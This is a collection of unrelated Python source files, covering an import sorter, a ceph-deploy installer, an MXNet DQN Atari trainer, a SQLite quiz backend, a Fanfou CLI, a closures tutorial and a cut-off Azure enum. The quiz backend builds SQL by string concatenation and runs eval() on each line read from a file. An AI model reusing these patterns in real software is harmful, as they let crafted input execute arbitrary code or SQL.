minmax_constraint_weight=minmax_constraint_weight)
backwards_opt.write_standard_file(
pickle_file_name=output_file_name,
denorm_input_matrices=input_matrices,
denorm_output_matrices=output_matrices,
initial_activations=initial_activations,
final_activations=final_activations, model_file_name=model_file_name,
metadata_dict=bwo_metadata_dict,
full_storm_id_strings=full_storm_id_strings,
storm_times_unix_sec=storm_times_unix_sec,
sounding_pressure_matrix_pa=sounding_pressure_matrix_pa)
if __name__ == '__main__':
INPUT_ARG_OBJECT = INPUT_ARG_PARSER.parse_args()
_run(
model_file_name=getattr(INPUT_ARG_OBJECT, MODEL_FILE_ARG_NAME),
init_function_name=getattr(
INPUT_ARG_OBJECT, INIT_FUNCTION_ARG_NAME),
storm_metafile_name=getattr(
INPUT_ARG_OBJECT, STORM_METAFILE_ARG_NAME),
num_examples=getattr(INPUT_ARG_OBJECT, NUM_EXAMPLES_ARG_NAME),
top_example_dir_name=getattr(
INPUT_ARG_OBJECT, EXAMPLE_DIR_ARG_NAME),
component_type_string=getattr(
INPUT_ARG_OBJECT, COMPONENT_TYPE_ARG_NAME),
target_class=getattr(INPUT_ARG_OBJECT, TARGET_CLASS_ARG_NAME),
layer_name=getattr(INPUT_ARG_OBJECT, LAYER_NAME_ARG_NAME),
neuron_indices=numpy.array(
getattr(INPUT_ARG_OBJECT, NEURON_INDICES_ARG_NAME), dtype=int),
channel_index=getattr(INPUT_ARG_OBJECT, CHANNEL_INDEX_ARG_NAME),
num_iterations=getattr(INPUT_ARG_OBJECT, NUM_ITERATIONS_ARG_NAME),
ideal_activation=getattr(
INPUT_ARG_OBJECT, IDEAL_ACTIVATION_ARG_NAME),
learning_rate=getattr(INPUT_ARG_OBJECT, LEARNING_RATE_ARG_NAME),
l2_weight=getattr(INPUT_ARG_OBJECT, L2_WEIGHT_ARG_NAME),
radar_constraint_weight=getattr(
INPUT_ARG_OBJECT, RADAR_CONSTRAINT_WEIGHT_ARG_NAME),
minmax_constraint_weight=getattr(
INPUT_ARG_OBJECT, MINMAX_CONSTRAINT_WEIGHT_ARG_NAME),
output_file_name=getattr(INPUT_ARG_OBJECT, OUTPUT_FILE_ARG_NAME)
)
|
# coding=utf-8
import os
import copy
import argparse
from import_sorter_libs import std_lib_modules
def parse_args():
"""Preparing & parsing arguments"""
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument(
'-A', '--all_files', type=bool, default=False, const=True, nargs='?',
help=u'Run script on all *.py files in current directory.')
parser.add_argument(
'-f', '--files', metavar='files', type=str, default='', nargs='+',
help=u'Run script on specified file.')
return parser.parse_args()
def get_file_imports(path):
imports = []
pos = 0
start_pos = None
last_import_position = 0
non_imports = []
try_block = []
with open(path, mode='r') as fts:
while True:
file_pos = fts.tell()
line = fts.readline()
if _is_import_line(line):
imports.append(line)
if start_pos is None:
start_pos = pos
last_import_position = pos
pos += 1
if line.split() and line.split()[0] in ['def', 'class']:
break
if file_pos == fts.tell():
break
if 'try:' in line:
try_block.append(line)
#pos += 1
while True:
line = fts.readline()
pos += 1
if line.strip() in ['except:', 'finally:'] or line.startswith(' '):
try_block.append(line)
else:
last_import_position = pos
break
return (imports, start_pos, last_import_position, try_block)
def _is_import_line(line):
if line.split() and not line.startswith(' '):
line_prefix = line.split()[0]
if line_prefix in ['import', 'from']:
return True
return False
def get_beautiful_imports(all_imports, non_imports, try_block):
std_imports = get_standard_imports(all_imports)
all_imports = list(set(all_imports) - set(std_imports))
local_imports = get_third_party_imports(all_imports)
third_party_imports = set(all_imports) - set(std_imports) - set(
local_imports)
ok_imports = get_import_the_right_way(std_imports, third_party_imports,
local_imports, non_imports, try_block)
return ok_imports
def get_from_and_import_separately(imports):
from_imports = []
import_imports = []
for import_ in imports:
if import_.split() and import_.split()[0] == 'from':
from_imports.append(import_)
else:
import_imports.append(import_)
import_imports.extend(from_imports)
return import_imports
def get_import_the_right_way(std_imports, third_party_imports, local_imports, non_imports, try_block):
std_imports = sorted(std_imports, key=len)
std_imports = get_from_and_import_separately(std_imports)
third_party_imports = sorted(third_party_imports, key=len)
third_party_imports = get_from_and_import_separately(third_party_imports)
local_imports = non_imports + sorted(local_imports, key=len) + try_block
local_imports = get_from_and_import_separately(local_imports)
if std_imports and (third_party_imports or local_imports):
std_imports.append('\n')
if third_party_imports and local_imports:
third_party_imports.append('\n')
return std_imports + third_party_imports + local_imports
def get_standard_imports(all_imports):
imports = []
for x in all_imports:
mod_name = get_module_name(x)
if mod_name in std_lib_modules:
imports.append(x.lstrip())
return imports
def get_third_party_imports(all_imports):
imports = []
ctm_imports = get_curent_dir_modules()
try:
ctm_imports.remove('modules')
except ValueError:
pass
for x in all_imports:
mod_name = get_module_name(x)
if mod_name in ctm_imports or 'security' in x:
imports.append(x.lstrip())
return imports
def get_module_name(mod_import):
import_separated = mod_import.split()
import_prefix = import_separated[0]
mod = import_separated[1]
if import_prefix == 'from':
if '.' in mod:
mod_name = mod.split('.')[0]
else:
mod_name = mod
else:
mod_name = mod
return mod_name
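# Illustrative check (not part of the original script): the top-level package
# name is what gets compared against std_lib_modules and the local modules.
assert get_module_name('from os.path import join') == 'os'
assert get_module_name('import argparse') == 'argparse'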
def get_curent_dir_modules():
a_dir = os.getcwd()
dir_mods = os.listdir('.')
modules = []
for mod in dir_mods:
if not os.path.isdir(mod) and len(mod.split('.')) == 2 and mod.split('.')[1] == 'py':
modules.append(mod.split('.')[0])
while True:
if '__init__.py' not in os.listdir(a_dir):
break
        a_dir = '/'.join(a_dir.split('/')[:-1])
return modules + [name for name in os.listdir(a_dir)
if os.path.isdir(os.path.join(a_dir, name)) and '.' not in name]
def get_files_to_sort(files=None, recursive=True):
if files:
return files
else:
path = os.getcwd()
result = [os.path.join(dp, f) for dp, dn, filenames in os.walk(path)
for f in filenames if os.path.splitext(f)[1] == '.py'
and '__' not in os.path.splitext(f)[0] and 'modules' not in dp]
return result
def get_non_imports(path, start_pos, end_pos):
non_imports = []
pos = 0
with open(path, mode='r') as fts:
while True:
file_pos = fts.tell()
line = fts.readline()
if pos == end_pos or (line.split() and line.split()[0] in ['def', 'class']):
break
if pos >= start_pos and _is_non_import(line):
non_imports.append(line)
pos += 1
return non_imports
def _is_non_import(line):
return (line.split()
and line.split()[0] not in ['import', 'from']
and '#' not in line
and line.strip() not in ['try:', 'except:', 'finally:']
and not (line.startswith('"""') or line.startswith("'''"))
)
def main():
nspace = parse_args()
files_to_sort = get_files_to_sort(nspace.files)
for file_path in files_to_sort:
imports_, start_pos, end_pos, try_block = get_file_imports(file_path)
non_imports = get_non_imports(file_path, start_pos, end_pos)
beautiful_imports = get_beautiful_imports(
imports_, non_imports, try_block)
with open(file_path, mode='r') as fts:
all_lines = fts.readlines()
with open(file_path, mode='w') as fts:
if beautiful_imports:
all_lines[start_pos:end_pos + 1] = beautiful_imports
fts.writelines(all_lines)
if __name__ == '__main__':
main()
"""
TODO:
High priority:
- multi-line imports with commas or brackets
- make sure std_lib modules list is complete
Low priority:
- expand file paths (e.g. ~/file to /home/user/file)
- option to collapse all imports from ... into one
- line length checking
- checking if two blank lines between class and last import
FIXED:
+ imports first, later from
FIX:
- webapp2_extras is recognized as a local module, while webapp2_extras.auth is handled
  correctly (recognized correctly in services/sync_service.py, but not in models/user.py)
- the cgi module is not recognized as a std_lib module
- 'from testcase_534 import TestCase534' is recognized as a third-party module
"""
|
from ceph_deploy.util import templates
from ceph_deploy.lib import remoto
from ceph_deploy.hosts.common import map_components
from ceph_deploy.util.paths import gpg
NON_SPLIT_PACKAGES = ['ceph-osd', 'ceph-mon', 'ceph-mds']
def rpm_dist(distro):
if distro.normalized_name in ['redhat', 'centos', 'scientific'] and distro.normalized_release.int_major >= 6:
return 'el' + distro.normalized_release.major
return 'el6'
def repository_url_part(distro):
"""
    Historically, CentOS, RHEL, and Scientific have all been mapped to `el6`
    URLs, but now that repositories are being added for `rhel`, the URLs should
    map correctly to, say, `rhel6` or `rhel7`.
This function looks into the `distro` object and determines the right url
part for the given distro, falling back to `el6` when all else fails.
Specifically to work around the issue of CentOS vs RHEL::
>>> import platform
>>> platform.linux_distribution()
('Red Hat Enterprise Linux Server', '7.0', 'Maipo')
"""
if distro.normalized_release.int_major >= 6:
if distro.normalized_name == 'redhat':
return 'rhel' + distro.normalized_release.major
if distro.normalized_name in ['centos', 'scientific']:
return 'el' + distro.normalized_release.major
return 'el6'
def install(distro, version_kind, version, adjust_repos, **kw):
packages = map_components(
NON_SPLIT_PACKAGES,
kw.pop('components', [])
)
logger = distro.conn.logger
release = distro.release
machine = distro.machine_type
repo_part = repository_url_part(distro)
dist = rpm_dist(distro)
distro.packager.clean()
# Get EPEL installed before we continue:
if adjust_repos:
distro.packager.install('epel-release')
distro.packager.install('yum-plugin-priorities')
distro.conn.remote_module.enable_yum_priority_obsoletes()
logger.warning('check_obsoletes has been enabled for Yum priorities plugin')
if version_kind in ['stable', 'testing']:
key = 'release'
else:
key = 'autobuild'
if adjust_repos:
if version_kind in ['stable', 'testing']:
distro.packager.add_repo_gpg_key(gpg.url(key))
if version_kind == 'stable':
url = 'https://download.ceph.com/rpm-{version}/{repo}/'.format(
version=version,
repo=repo_part,
)
elif version_kind == 'testing':
url = 'https://download.ceph.com/rpm-testing/{repo}/'.format(repo=repo_part)
remoto.process.run(
distro.conn,
[
'rpm',
'-Uvh',
'--replacepkgs',
'{url}noarch/ceph-release-1-0.{dist}.noarch.rpm'.format(url=url, dist=dist),
],
)
elif version_kind in ['dev', 'dev_commit']:
logger.info('skipping install of ceph-release package')
logger.info('repo file will be created manually')
mirror_install(
distro,
'http://gitbuilder.ceph.com/ceph-rpm-centos{release}-{machine}-basic/{sub}/{version}/'.format(
release=release.split(".", 1)[0],
machine=machine,
sub='ref' if version_kind == 'dev' else 'sha1',
version=version),
gpg.url(key),
adjust_repos=True,
extra_installs=False
)
else:
raise Exception('unrecognized version_kind %s' % version_kind)
# set the right priority
logger.warning('ensuring that /etc/yum.repos.d/ceph.repo contains a high priority')
distro.conn.remote_module.set_repo_priority(['Ceph', 'Ceph-noarch', 'ceph-source'])
logger.warning('altered ceph.repo priorities to contain: priority=1')
if packages:
distro.packager.install(packages)
def mirror_install(distro, repo_url, gpg_url, adjust_repos, extra_installs=True, **kw):
packages = map_components(
NON_SPLIT_PACKAGES,
kw.pop('components', [])
)
repo_url = repo_url.strip('/') # Remove trailing slashes
distro.packager.clean()
if adjust_repos:
distro.packager.add_repo_gpg_key(gpg_url)
ceph_repo_content = templates.ceph_repo.format(
repo_url=repo_url,
gpg_url=gpg_url
)
distro.conn.remote_module.write_yum_repo(ceph_repo_content)
# set the right priority
if distro.packager.name == 'yum':
distro.packager.install('yum-plugin-priorities')
distro.conn.remote_module.set_repo_priority(['Ceph', 'Ceph-noarch', 'ceph-source'])
distro.conn.logger.warning('altered ceph.repo priorities to contain: priority=1')
if extra_installs and packages:
distro.packager.install(packages)
def repo_install(distro, reponame, baseurl, gpgkey, **kw):
packages = map_components(
NON_SPLIT_PACKAGES,
kw.pop('components', [])
)
logger = distro.conn.logger
# Get some defaults
name = kw.pop('name', '%s repo' % reponame)
enabled = kw.pop('enabled', 1)
gpgcheck = kw.pop('gpgcheck', 1)
install_ceph = kw.pop('install_ceph', False)
proxy = kw.pop('proxy', '') # will get ignored if empty
_type = 'repo-md'
baseurl = baseurl.strip('/') # Remove trailing slashes
distro.packager.clean()
if gpgkey:
distro.packager.add_repo_gpg_key(gpgkey)
repo_content = templates.custom_repo(
reponame=reponame,
name=name,
baseurl=baseurl,
enabled=enabled,
gpgcheck=gpgcheck,
_type=_type,
gpgkey=gpgkey,
proxy=proxy,
**kw
)
distro.conn.remote_module.write_yum_repo(
repo_content,
"%s.repo" % reponame
)
repo_path = '/etc/yum.repos.d/{reponame}.repo'.format(reponame=reponame)
# set the right priority
if kw.get('priority'):
if distro.packager.name == 'yum':
distro.packager.install('yum-plugin-priorities')
distro.conn.remote_module.set_repo_priority([reponame], repo_path)
logger.warning('altered {reponame}.repo priorities to contain: priority=1'.format(
reponame=reponame)
)
# Some custom repos do not need to install ceph
if install_ceph and packages:
distro.packager.install(packages)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
import mxnet.ndarray as nd
import numpy
from base import Base
from operators import *
from atari_game import AtariGame
from utils import get_numpy_rng, parse_ctx
import logging
import argparse
import os
import sys
import time
root = logging.getLogger()
root.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
mx.random.seed(100)
npy_rng = get_numpy_rng()
class DQNInitializer(mx.initializer.Xavier):
def _init_bias(self, _, arr):
arr[:] = .1
def main():
parser = argparse.ArgumentParser(description='Script to test the trained network on a game.')
parser.add_argument('-r', '--rom', required=False, type=str,
default=os.path.join('roms', 'breakout.bin'),
help='Path of the ROM File.')
parser.add_argument('-v', '--visualization', action='store_true',
help='Visualize the runs.')
parser.add_argument('--lr', required=False, type=float, default=0.01,
help='Learning rate of the AdaGrad optimizer')
parser.add_argument('--eps', required=False, type=float, default=0.01,
help='Eps of the AdaGrad optimizer')
parser.add_argument('--clip-gradient', required=False, type=float, default=None,
help='Clip threshold of the AdaGrad optimizer')
parser.add_argument('--double-q', action='store_true',
help='Use Double DQN only if specified')
parser.add_argument('--wd', required=False, type=float, default=0.0,
help='Weight of the L2 Regularizer')
parser.add_argument('-c', '--ctx', required=False, type=str, default='gpu',
help='Running Context. E.g `-c gpu` or `-c gpu1` or `-c cpu`')
parser.add_argument('-d', '--dir-path', required=False, type=str, default='',
help='Saving directory of model files.')
parser.add_argument('--start-eps', required=False, type=float, default=1.0,
help='Eps of the epsilon-greedy policy at the beginning')
parser.add_argument('--replay-start-size', required=False, type=int, default=50000,
help='The step that the training starts')
parser.add_argument('--kvstore-update-period', required=False, type=int, default=1,
                        help='The period that the worker updates the parameters from the server')
parser.add_argument('--kv-type', required=False, type=str, default=None,
help='type of kvstore, default will not use kvstore, could also be dist_async')
parser.add_argument('--optimizer', required=False, type=str, default="adagrad",
help='type of optimizer')
args = parser.parse_args()
if args.dir_path == '':
rom_name = os.path.splitext(os.path.basename(args.rom))[0]
args.dir_path = 'dqn-%s-lr%g' % (rom_name, args.lr)
replay_start_size = args.replay_start_size
max_start_nullops = 30
replay_memory_size = 1000000
history_length = 4
rows = 84
cols = 84
ctx = parse_ctx(args.ctx)
q_ctx = mx.Context(*ctx[0])
game = AtariGame(rom_path=args.rom, resize_mode='scale', replay_start_size=replay_start_size,
resized_rows=rows, resized_cols=cols, max_null_op=max_start_nullops,
replay_memory_size=replay_memory_size, display_screen=args.visualization,
history_length=history_length)
##RUN NATURE
freeze_interval = 10000
epoch_num = 200
steps_per_epoch = 250000
update_interval = 4
discount = 0.99
eps_start = args.start_eps
eps_min = 0.1
eps_decay = (eps_start - eps_min) / 1000000
eps_curr = eps_start
freeze_interval /= update_interval
minibatch_size = 32
action_num = len(game.action_set)
data_shapes = {'data': (minibatch_size, history_length) + (rows, cols),
'dqn_action': (minibatch_size,), 'dqn_reward': (minibatch_size,)}
dqn_sym = dqn_sym_nature(action_num)
qnet = Base(data_shapes=data_shapes, sym_gen=dqn_sym, name='QNet',
initializer=DQNInitializer(factor_type="in"),
ctx=q_ctx)
target_qnet = qnet.copy(name="TargetQNet", ctx=q_ctx)
use_easgd = False
optimizer = mx.optimizer.create(name=args.optimizer, learning_rate=args.lr, eps=args.eps,
clip_gradient=args.clip_gradient,
rescale_grad=1.0, wd=args.wd)
updater = mx.optimizer.get_updater(optimizer)
qnet.print_stat()
target_qnet.print_stat()
# Begin Playing Game
training_steps = 0
total_steps = 0
for epoch in range(epoch_num):
# Run Epoch
steps_left = steps_per_epoch
episode = 0
epoch_reward = 0
start = time.time()
game.start()
while steps_left > 0:
# Running New Episode
episode += 1
episode_loss = 0.0
episode_q_value = 0.0
episode_update_step = 0
episode_action_step = 0
time_episode_start = time.time()
game.begin_episode(steps_left)
while not game.episode_terminate:
# 1. We need to choose a new action based on the current game status
if game.state_enabled and game.replay_memory.sample_enabled:
do_exploration = (npy_rng.rand() < eps_curr)
eps_curr = max(eps_curr - eps_decay, eps_min)
if do_exploration:
action = npy_rng.randint(action_num)
else:
# TODO Here we can in fact play multiple gaming instances simultaneously and make actions for each
# We can simply stack the current_state() of gaming instances and give prediction for all of them
# We need to wait after calling calc_score(.), which makes the program slow
# TODO Profiling the speed of this part!
current_state = game.current_state()
state = nd.array(current_state.reshape((1,) + current_state.shape),
ctx=q_ctx) / float(255.0)
qval_npy = qnet.forward(is_train=False, data=state)[0].asnumpy()
action = numpy.argmax(qval_npy)
episode_q_value += qval_npy[0, action]
episode_action_step += 1
else:
action = npy_rng.randint(action_num)
# 2. Play the game for a single mega-step (Inside the game, the action may be repeated for several times)
game.play(action)
total_steps += 1
# 3. Update our Q network if we can start sampling from the replay memory
# Also, we update every `update_interval`
if total_steps % update_interval == 0 and game.replay_memory.sample_enabled:
# 3.1 Draw sample from the replay_memory
training_steps += 1
episode_update_step += 1
states, actions, rewards, next_states, terminate_flags \
= game.replay_memory.sample(batch_size=minibatch_size)
states = nd.array(states, ctx=q_ctx) / float(255.0)
next_states = nd.array(next_states, ctx=q_ctx) / float(255.0)
actions = nd.array(actions, ctx=q_ctx)
rewards = nd.array(rewards, ctx=q_ctx)
terminate_flags = nd.array(terminate_flags, ctx=q_ctx)
# 3.2 Use the target network to compute the scores and
# get the corresponding target rewards
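                    # (Annotation, not in the original script.) The targets follow the Bellman
                    # backup: plain DQN uses
                    #     y = r + gamma * max_a Q_target(s', a) * (1 - done)
                    # while Double DQN picks the action with the online network and evaluates
                    # it with the target network:
                    #     y = r + gamma * Q_target(s', argmax_a Q_online(s', a)) * (1 - done)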
if not args.double_q:
target_qval = target_qnet.forward(is_train=False, data=next_states)[0]
target_rewards = rewards + nd.choose_element_0index(target_qval,
nd.argmax_channel(target_qval))\
* (1.0 - terminate_flags) * discount
else:
target_qval = target_qnet.forward(is_train=False, data=next_states)[0]
qval = qnet.forward(is_train=False, data=next_states)[0]
target_rewards = rewards + nd.choose_element_0index(target_qval,
nd.argmax_channel(qval))\
* (1.0 - terminate_flags) * discount
outputs = qnet.forward(is_train=True,
data=states,
dqn_action=actions,
dqn_reward=target_rewards)
qnet.backward()
qnet.update(updater=updater)
# 3.3 Calculate Loss
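                    # (Annotation.) The expression below reproduces the Huber-style loss from the
                    # Nature DQN paper for logging: quadratic while |TD error| <= 1, linear beyond.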
diff = nd.abs(nd.choose_element_0index(outputs[0], actions) - target_rewards)
quadratic_part = nd.clip(diff, -1, 1)
loss = 0.5 * nd.sum(nd.square(quadratic_part)).asnumpy()[0] +\
nd.sum(diff - quadratic_part).asnumpy()[0]
episode_loss += loss
# 3.3 Update the target network every freeze_interval
if training_steps % freeze_interval == 0:
qnet.copy_params_to(target_qnet)
steps_left -= game.episode_step
time_episode_end = time.time()
# Update the statistics
epoch_reward += game.episode_reward
info_str = "Epoch:%d, Episode:%d, Steps Left:%d/%d, Reward:%f, fps:%f, Exploration:%f" \
% (epoch, episode, steps_left, steps_per_epoch, game.episode_reward,
game.episode_step / (time_episode_end - time_episode_start), eps_curr)
if episode_update_step > 0:
info_str += ", Avg Loss:%f/%d" % (episode_loss / episode_update_step,
episode_update_step)
if episode_action_step > 0:
info_str += ", Avg Q Value:%f/%d" % (episode_q_value / episode_action_step,
episode_action_step)
if episode % 100 == 0:
logging.info(info_str)
end = time.time()
fps = steps_per_epoch / (end - start)
qnet.save_params(dir_path=args.dir_path, epoch=epoch)
logging.info("Epoch:%d, FPS:%f, Avg Reward: %f/%d"
% (epoch, fps, epoch_reward / float(episode), episode))
if __name__ == '__main__':
main()
|
#!/usr/bin/python
'''
Morgan Phillips (c) 2013
This file is part of qaw.
qaw is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
qaw is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with qaw. If not, see <http://www.gnu.org/licenses/>.
'''
import sqlite3
import random
import re
import qaexceptions
class QABackend:
dbConn = sqlite3.connect('qaw.db')
def updateConfidenceLevel(self,tableName,questionID,newConfidence):
if(int(newConfidence) < 0):
newConfidence = 0
elif(int(newConfidence) > 100):
newConfidence = 100
dbCursor = self.dbConn.cursor()
updateConfidenceSQL = "UPDATE "+tableName+" SET confidence='"
updateConfidenceSQL += str(newConfidence)+"' WHERE "
updateConfidenceSQL += "id='"+str(questionID)+"'"
return dbCursor.execute(updateConfidenceSQL)
def loadCurrentTables(self):
dbCursor = self.dbConn.cursor()
loadTablesSQL = "SELECT name FROM sqlite_master WHERE type='table'"
returnList = list()
for tableName in dbCursor.execute(loadTablesSQL):
if tableName[0] != "sqlite_sequence":
returnList.append(tableName[0])
return returnList
def loadQuestionAnswer(self,tableNames = list()):
dbCursor = self.dbConn.cursor()
getQuestionAnswerSQL = "SELECT * FROM "
returnList = list()
tableName = random.choice(tableNames)
returnList.append(tableName)
getQuestionAnswerSQL += tableName
confidenceLevel = random.randint(0,100)
getQuestionAnswerSQL += " WHERE confidence < "+str(confidenceLevel)
getQuestionAnswerSQL += " ORDER BY RANDOM() LIMIT 1"
dbCursor.execute(getQuestionAnswerSQL)
returnList.append(dbCursor.fetchone())
return returnList
def loadTextFile(self,textFile,tableName=None):
try:
fileHandle = open(textFile,'r')
#A default tableName appears....
if tableName == None:
tableName = textFile.split('/')[-1].replace('.','')
dbCursor = self.dbConn.cursor()
createTableIfSQL = "CREATE TABLE IF NOT EXISTS "+tableName
createTableIfSQL += " (id INTEGER PRIMARY KEY AUTOINCREMENT,"
createTableIfSQL += "question TEXT UNIQUE,"
createTableIfSQL += "answer TEXT,confidence INTEGER DEFAULT 0)"
dbCursor.execute(createTableIfSQL)
lineCount = 0
for line in fileHandle:
lineCount += 1
match = re.search("[.*,.*].*",line)
if match != None:
try:
QA = eval(line)
insertSQL = "INSERT INTO "+tableName
insertSQL += " (question,answer) VALUES ('"+QA[0]+"','"+QA[1]+"')"
dbCursor.execute(insertSQL)
except:
print qaexceptions.ParsingError(lineCount)
self.dbConn.commit()
return "Finished"
except IOError, e:
return e
def dropTable(self,tableName):
try:
dbCursor = self.dbConn.cursor()
dropTableIfSQL = "DROP TABLE IF EXISTS "
dropTableIfSQL += tableName
dbCursor.execute(dropTableIfSQL)
return "Dropped: "+tableName
except:
return "Failed to drop: "+tableName
|
#!/usr/bin/env python3
# coding=utf-8
# Author: John Jiang
# Date : 2016/8/29
import argparse
import atexit
import logging
import os
import signal
import sys
from .util import clear_screen, open_in_browser
from .config import cfg
from .fan import Fan
def parse_args():
parser = argparse.ArgumentParser()
command_parser = parser.add_argument_group('命令')
command_parser.add_argument('-n', '--new', metavar='X', nargs='*', help='发布新的状态')
command_parser.add_argument('-i', '--image', help='添加图片')
command_parser.add_argument('-r', '--revert', action='store_true', help='撤回前一条消息')
command_parser.add_argument('-m', '--me', action='store_true', help='查看个人信息')
command_parser.add_argument('-u', '--user', metavar='ID', help='查看他人信息,参数为用户ID')
command_parser.add_argument('-v', '--view', action='store_true', help='浏览模式')
command_parser.add_argument('-d', '--random', action='store_true', help='随便看看')
command_parser.add_argument('--config', action='store_true', help='修改默认配置')
command_parser.add_argument('--login', action='store_true', help='登陆新的账号')
command_parser.add_argument('--switch', action='store_true', help='切换账号')
command_parser.add_argument('--dump', metavar='FILE', nargs='?', const='fanfou-archive.json',
help='备份所有状态,保存到 FILE 文件中(JSON格式)')
command_parser.add_argument('--lock', metavar='0/1', type=int, help='需要我批准才能查看我的消息(1表示上锁,0表示解锁)')
command_parser.add_argument('-V', '--version', action='store_true', help='显示版本号')
option_parser = parser.add_argument_group('选项')
option_parser.add_argument('--verbose', action='store_true', help='打印日志')
option_parser.add_argument('--show-id', dest='show_id', action='store_true', help='显示用户ID')
option_parser.add_argument('--show-time', dest='show_time_tag', action='store_true', help='显示时间标签')
option_parser.add_argument('--clear', dest='auto_clear', action='store_true', help='浏览完成后自动清屏')
option_parser.add_argument('--auto-auth', dest='auto_auth', action='store_true', help='自动验证')
option_parser.add_argument('--count', dest='timeline_count', type=int, help='时间线显示消息的数量')
option_parser.add_argument('--show-image', dest='show_image', action='store_true', help='显示图片')
option_parser.add_argument('--xauth', action='store_true', help='使用xauth验证方式')
return parser.parse_known_args()
def exit_handler(signal, frame):
print('\nBye!')
sys.exit(0)
def read_from_stdin():
try:
return sys.stdin.buffer.read().decode('utf8')
except UnicodeDecodeError:
logging.error('[x] 当前内容不是UTF-8编码,解码错误!')
sys.exit(1)
@atexit.register
def clear_screen_handler():
if cfg.auto_clear:
clear_screen()
def main():
signal.signal(signal.SIGINT, exit_handler)
args, unknown = parse_args()
level = logging.DEBUG if args.verbose else logging.INFO
logging.basicConfig(level=level,
format='%(asctime)s [%(levelname)s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
cfg.args = args
if args.version:
import fanfoucli
print(fanfoucli.__version__)
return
if len(sys.argv) == 1:
open_in_browser('http://fanfou.com')
return
fan = Fan(cfg)
if args.config:
cfg.configure()
elif args.dump:
fan.dump(args.dump)
elif args.login:
fan.login()
elif args.switch:
fan.switch_account()
elif args.revert:
fan.revert()
elif args.lock is not None:
fan.lock(bool(args.lock))
elif args.me:
fan.me()
elif args.user:
s, user = fan.api.users_show(id=args.user)
if s:
fan.display_user(user)
elif args.view:
fan.view()
elif args.random:
fan.random_view()
else:
status = ''
# fan -
# echo something | fan
if (len(sys.argv) == 2 and sys.argv[1] == '-') \
or (len(sys.argv) == 1 and hasattr(sys.stdin, 'fileno') and not os.isatty(sys.stdin.fileno())):
            # sys.stdin.read decodes with sys.stdin.encoding by default, which is set from the
            # terminal, so piping (e.g. `cat xx | fan`) can raise decoding errors.
            # Read the raw byte stream instead and decode it as UTF-8 manually; input that is
            # not UTF-8 will still fail, and read_from_stdin reports that error.
logging.debug('stdin encoding %s', sys.stdin.encoding)
status = read_from_stdin()
elif args.new: # fan -n something
status = ' '.join(args.new)
elif unknown: # fan anything
status = ' '.join(unknown)
        # post an image if one was supplied, otherwise post plain text
if args.image:
fan.upload_photos(status, args.image)
else:
fan.update_status(status)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
'''Item 15 from Effective Python'''
# Example 1
''' A common way to do this is to pass a helper function as the key argument to
a list's sort method. The helper's return value will be used as the value for
sorting each item in the list '''
print('Example 1:\n==========')
def sort_priority(values, group):
def helper(x):
if x in group:
return (0, x)
return (1, x)
values.sort(key=helper)
# Example 2
''' That function works for simple inputs '''
print('\nExample 2:\n==========')
numbers = [8, 3, 1, 2, 5, 4, 7, 6]
group = {2, 3, 5, 7}
sort_priority(numbers, group)
print(numbers)
# Example 3
''' Why not also use the closure to flip a flag when high-priority items are
seen? Then the function can return the flag value after it's been modified by
the closure '''
print('\nExample 3:\n==========')
def sort_priority2(numbers, group):
found = False
def helper(x):
if x in group:
found = True # Seems simple
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found
# Example 4
''' run the function on the same inputs as before '''
print('\nExample 4:\n==========')
found = sort_priority2(numbers, group)
print('Found:', found)
print(numbers)
# Example 5
''' The nonlocal statement is used to indicate that scope traversal should
happen upon assignment for a specific variable name '''
print('\nExample 5:\n==========')
def sort_priority3(numbers, group):
found = False
def helper(x):
nonlocal found
if x in group:
found = True
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found
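''' Quick check (not part of the original listing), re-using the numbers and group defined
above: with nonlocal, the flag set inside the closure is visible to sort_priority3's caller '''
found = sort_priority3(numbers, group)
print('Found:', found)
print(numbers)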
# Example 6
''' When your usage of nonlocal starts getting complicated, it's better to wrap
your state in a helper class. Here, I define a class that achieves the same
result as the nonlocal approach '''
print('\nExample 6:\n==========')
class Sorter(object):
def __init__(self, group):
self.group = group
self.found = False
def __call__(self, x):
if x in self.group:
self.found = True
return (0, x)
return (1, x)
sorter = Sorter(group)
numbers.sort(key=sorter)
assert sorter.found is True
print('Found:', sorter.found)
print(numbers)
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class Access(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The network traffic is allowed or denied.
"""
ALLOW = "allow"
DENY = "deny"
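# Illustration (not part of the generated file): the case-insensitive metaclass lets
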